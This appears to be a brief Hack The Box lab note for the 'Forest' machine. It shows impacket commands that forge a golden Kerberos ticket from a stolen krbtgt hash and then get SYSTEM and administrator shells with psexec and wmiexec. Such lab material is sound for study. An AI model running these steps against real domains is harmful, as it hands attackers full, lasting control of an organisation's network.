root@ippsec:/usr/share/doc/python3-impacket/examples# python ticketer.py -nthash 8191f826bb148e603acb0f33d17632f8 -domain-sid S-1-5-21-3072663084-364016917-1341370565 -domain htb.local administrator
here:
nthash is the krbtgt hash that we have got after compromising the domain AD.
way of getting domain sid is, use this powershell command:
Get-ADDomain htb.local
administrator is the username
export KRB5CCNAME=administrator.ccache
root@ippsec:/usr/share/doc/python3-impacket/examples# ./psexec.py htb.local/administrator@forest or 10.10.10.161 -k -no-pass
using psexec you will get nt authority\system
root@ippsec:/usr/share/doc/python3-impacket/examples# ./wmiexec.py htb.local/administrator@forest or 10.10.10.161 -k -no-pass
using wmiexec you will get administrator.
vi /etc/hosts
10.10.10.161 htb.local htb forest
vi /etc/resolve.conf
nameserver 8.8.8.8
Comments
Post a Comment